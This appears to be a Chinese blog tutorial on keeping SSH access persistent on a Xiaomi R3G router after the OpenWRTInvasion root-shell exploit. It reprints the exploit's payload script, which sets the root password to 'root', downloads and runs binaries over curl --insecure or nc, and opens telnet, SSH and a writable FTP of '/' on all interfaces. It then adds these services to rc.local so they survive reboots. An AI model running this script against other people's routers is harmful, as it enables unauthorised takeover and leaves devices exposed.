小米路由器R3G稳定2.28.44 固化SSH

1.SSH

参考恩山论坛的帖子SSH即可
[R3G] R3G 和 R3GV2 解锁 SSH
我做了实验 R3G稳定2.28.44 是可以一键SSH的。

2.固化SSH

帖子中SSH所使用的本质是OpenWRTInvasion
原理是通过小米路由器的Root shell漏洞上传二进制文件进而获取SSH及root
但是所有的二进制文件全部上传于/tmp目录下，而小米路由器在每次重启后都会重置该目录，也就是说重启便会丢失SSH。
当然OpenWRTInvasion项目本来就是通过获取SSH进而刷写不死鸟然后刷到OpenWRT的。
让我们看下相关执行脚本

#!/bin/ash

set -euo pipefail

exploit() {
    setup_password
    setup_busybox
    start_telnet
    start_ftp
    start_ssh
    echo "Done exploiting"
}

download_file_from_github() {
    # Rationale for using --insecure: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250
    curl -L "https://github.com/acecilia/OpenWRTInvasion/raw/master/script_tools/$1" --insecure --output "$2"
}

download_file_from_tcp_server() {
    echo "$1" | nc "${REMOTE_ADDR}" "${QUERY_STRING}" >"$2"
}

get_file() {
    src_file="$1"
    dst_file="$2"

    rm -rf "${dst_file}"

    port="${QUERY_STRING}"
    if [ x"${port}" = x0 ]; then
        download_file_from_github "${src_file}" "${dst_file}"
    else
        download_file_from_tcp_server "${src_file}" "${dst_file}"
    fi
}

setup_password() {
    # Override existing password, as the default one set by xiaomi is unknown
    # https://www.systutorials.com/changing-linux-users-password-in-one-command-line/
    echo -e "root\nroot" | passwd root
}

setup_busybox() {
    # kill/stop telnet, in case it is running from a previous execution
    pgrep busybox | xargs kill || true

    cd /tmp
    get_file busybox-mipsel busybox
    chmod +x busybox
}

start_ftp() {
    cd /tmp
    ln -sfn busybox ftpd # Create symlink needed for running ftpd
    ./busybox tcpsvd -vE 0.0.0.0 21 ./ftpd -Sw / >> /tmp/messages 2>&1 &
}

start_telnet() {
    cd /tmp
    ./busybox telnetd
}

start_ssh() {
    cd /tmp

    # Clean
    rm -rf dropbear
    rm -rf /etc/dropbear

    # kill/stop dropbear, in case it is running from a previous execution
    pgrep dropbear | xargs kill || true

    # Donwload dropbear static mipsel binary
    get_file dropbearStaticMipsel.tar.bz2 dropbear.tar.bz2
    mkdir dropbear
    /tmp/busybox tar xvfj dropbear.tar.bz2 -C dropbear --strip-components=1

    # Add keys
    # http://www.ibiblio.org/elemental/howto/dropbear-ssh.html
    mkdir -p /etc/dropbear
    cd /etc/dropbear
    /tmp/dropbear/dropbearkey -t rsa -f dropbear_rsa_host_key
    /tmp/dropbear/dropbearkey -t dss -f dropbear_dss_host_key

    # Start SSH server
    /tmp/dropbear/dropbear

    # https://unix.stackexchange.com/a/402749
    # Login with ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc root@192.168.0.21
}

remount() {
    echo "Remount /usr/share/xiaoqiang as read-write"

    cp -R /usr/share/xiaoqiang /tmp/xiaoqiang
    mount --bind /tmp/xiaoqiang /usr/share/xiaoqiang

    echo "Done remounting"
}

# Function inspired by https://openwrt.org/docs/guide-user/installation/generic.backup#create_full_mtd_backup
mtd_backup() {
    TMPDIR="/tmp"
    BACKUP_DIR="${TMPDIR}/mtd_backup"
    OUTPUT_FILE="${TMPDIR}/mtd_backup.tgz"

    # Start
    echo "Start"
    rm -rf "${BACKUP_DIR}"
    mkdir -p "${BACKUP_DIR}"

    # List remote mtd devices from /proc/mtd. The first line is just a table
    # header, so skip it (using tail)
    cat /proc/mtd | tail -n+2 | while read; do
        MTD_DEV=$(echo ${REPLY} | cut -f1 -d:)
        MTD_NAME=$(echo ${REPLY} | cut -f2 -d\")
        echo "Backing up ${MTD_DEV} (${MTD_NAME})"
        dd if="/dev/${MTD_DEV}" of="${BACKUP_DIR}/${MTD_DEV}_${MTD_NAME}.bin"
    done
    
    # Do not compress, as the device runs out of storage for such operation
    echo "Done backing up"
}

# From https://stackoverflow.com/a/16159057
"$@"

可以看到相关二进制全部存放于/tmp目录中，想要固化，本质上就是拷贝到其他目录

1.查看目录解构，选择存放目录

df -h

最终选择存放到/userdisk目录下

2.拷贝dropbear[用于提供ssh]

cp -r /tmp/dropbear/ /userdisk/dropbear/

3.拷贝busybox工具箱

mkdir -p /userdisk/busybox
cp /tmp/busybox /userdisk/busybox/

4.添加启动引导

编辑/etc/rc.local文件 添加开机执行脚本文件
需要注意在exit 0 之前添加

#ssh支持
/userdisk/dropbear/dropbear
#ftpd支持
ln -sfn /userdisk/busybox/busybox /tmp/ftpd
/userdisk/busybox/busybox tcpsvd -vE 0.0.0.0 21 /tmp/ftpd -Sw / >> /tmp/messages 2>&1 &
#telnetd支持
/userdisk/busybox/busybox telnetd

完整文件如下：

# restore phy config
speed=$(uci -q get xiaoqiang.common.WAN_SPEED)
[ -n "$speed" ] && /usr/sbin/phyhelper swan "$speed"
/userdisk/dropbear/dropbear
ln -sfn /userdisk/busybox/busybox /tmp/ftpd
/userdisk/busybox/busybox tcpsvd -vE 0.0.0.0 21 /tmp/ftpd -Sw / >> /tmp/messages 2>&1 &
/userdisk/busybox/busybox telnetd
exit 0

3.修改路由器 Banner[非必须]

1.生成

生成地址:http://patorjk.com/software/taag/#p=display&f=Big Money-ne&t=ARE U OK

2.修改

R3G的Banner文件位于/etc/banner

3.效果